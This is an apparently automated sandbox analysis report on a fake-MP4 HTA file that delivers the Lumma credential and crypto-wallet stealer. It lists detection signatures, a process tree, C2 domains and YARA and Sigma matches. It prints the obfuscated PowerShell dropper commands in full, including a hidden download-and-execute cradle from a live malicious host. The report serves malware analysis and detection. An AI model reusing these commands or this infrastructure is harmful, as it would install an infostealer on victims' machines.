Edit tour

Windows Analysis Report
web44.mp4.hta

Overview

General Information

Sample name:	web44.mp4.hta
Analysis ID:	1582508
MD5:	b775351f7a697d6deb1d440dc12d9761
SHA1:	b133d42502750817aa8e88119ff36158d2f8ecee
SHA256:	4baabdbe96a16716454a62abd7a7105d8b3a775c2428a0052d9738b0412a32c6
Tags:	EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

Yara detected MSILLoadEncryptedAssembly

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 2180 cmdline: mshta.exe "C:\Users\user\Desktop\web44.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4D6CE5435B9C16288D414EE8E349A3BF9838C48BA07E0867323DDE4E5572601FA9BB120B55CAA324190E009A27764C940845385969A28951E751A0CF0728A964D5C51EBD9544AC4990BE672CAD7B396BBEF89DFDE80BE842526D86ABE4AA6D1E4BFD25AE60A3DEA1F3E2F846876ED249DE784062CBFBE27EFA4819F4765FF1CC015C83F07E6577CCAB21BE70428AD1ACA3C7E6AC62B68C837C4EA37BA7CED0CDE8AD0C4965F1E5021692C033B66402108063C23CED961183A6DD2C1CFC144B8EFF515734FC6B27E6016B97A7F1AB09F93CBED2E3137401C7368545EB1501A01BBF0E8804C5BE4D172BD6CFF7B3034A37A747061BDA44FB7F7919AC363B942444431CAA18E395133309FE68CE150110C94D38790C8DC33EECF26DFF39F4228577E191BE871694949D7C9654C230AA47959522BB12AB4FDE8CB97C660CACEEA2FE5C73301DAFFD1257E3BB3995CB00392184D42E752DB81EF1B8D61C080C8147C57576290FA10D3AB2EFC9A53B2CB8532A3BC9FC528DE59C06CCF66239E212D42A9D08766166B97F5F6EFF342D75DACCCD170CE578C7F249D15A39AC37FA59BD875AA27FA3BBF895D6AA2FE42B0F2492CCB838F55FFABC2DBBB229CF7047EABAE7F2C418CC4F83F307BC2110A574B66D76555DCAEAF4A03900042D57B839B2A542B79417BD601DE47779284C49E227317E879E01F0696F2AF0EAD0A8D5383B0082FCA2472677B395EC38C0AB310841BBE741A906976E5611C65708F804FA66E89A4C7D5CF7A33CCD94D4C83E062BBA4B786AB5ACB75AC235F97058A2FD8FFDF355A495709F07B03A0C26194723473FA90E5C3D03BBFB38845DEB5C9ECF6AC7B909DBC0BEE6A9D9EB34826E09B638F7F209EF7ADAE7E4FBF01C05D4CBC93AD140D12D5D949275FA9A7D00565497C06C18666D6EF0BDAEE6A765CFF58371F12F0BEC97E55B427776A2D5FBCCA5E0800BAECFB8E5B21D8EB205921E0D9C5F75B9031ED7CC4062F26832446A2A2E200073651C4C229A0687FEC12976E205DACC5D0EE8');$IWmh=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((edSX('4B786D724A434A7546627358426F6C4F')),[byte[]]::new(16)).TransformFinalBlock($lUxv,0,$lUxv.Length)); & $IWmh.Substring(0,3) $IWmh.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3784 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn)) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2292 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "inherineau.buzz", "noisercluch.click", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "WG6I6S--web44"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2954035753.0000000008C90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 6396	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1da2b6:$b1: ::WriteAllBytes( 0x1dae29:$b1: ::WriteAllBytes( 0x40397:$s1: -join 0x4163a:$s1: -join 0x4299e:$s1: -join 0x5cdbb:$s1: -join 0x5dff6:$s1: -join 0x60055:$s1: -join 0x61a36:$s1: -join 0x62c85:$s1: -join 0x64c31:$s1: -join 0x650cf:$s1: -join 0x6746d:$s1: -join 0x8149b:$s1: -join 0x826d6:$s1: -join 0x8a99d:$s1: -join 0x8bbd8:$s1: -join 0x9a281:$s1: -join 0xa7616:$s1: -join 0x105bb7:$s1: -join 0x11000c:$s1: -join
Process Memory Space: powershell.exe PID: 3784	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: powershell.exe PID: 3784	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xb11073:$b2: ::FromBase64String( 0x66dae4:$s1: -join 0x66e9ba:$s1: -join 0x675b4e:$s1: -join 0x68a1aa:$s1: -join 0x69727f:$s1: -join 0x69a651:$s1: -join 0x69ad03:$s1: -join 0x69c7f4:$s1: -join 0x69e9fa:$s1: -join 0x69f221:$s1: -join 0x69fa91:$s1: -join 0x6a01cc:$s1: -join 0x6a01fe:$s1: -join 0x6a0246:$s1: -join 0x6a0265:$s1: -join 0x6a0ab5:$s1: -join 0x6a0c31:$s1: -join 0x6a0ca9:$s1: -join 0x6a0d3c:$s1: -join 0x6a0fa2:$s1: -join
Process Memory Space: powershell.exe PID: 2292	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.powershell.exe.8c90000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn)) , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn)) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B88

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn)) , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn)) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = 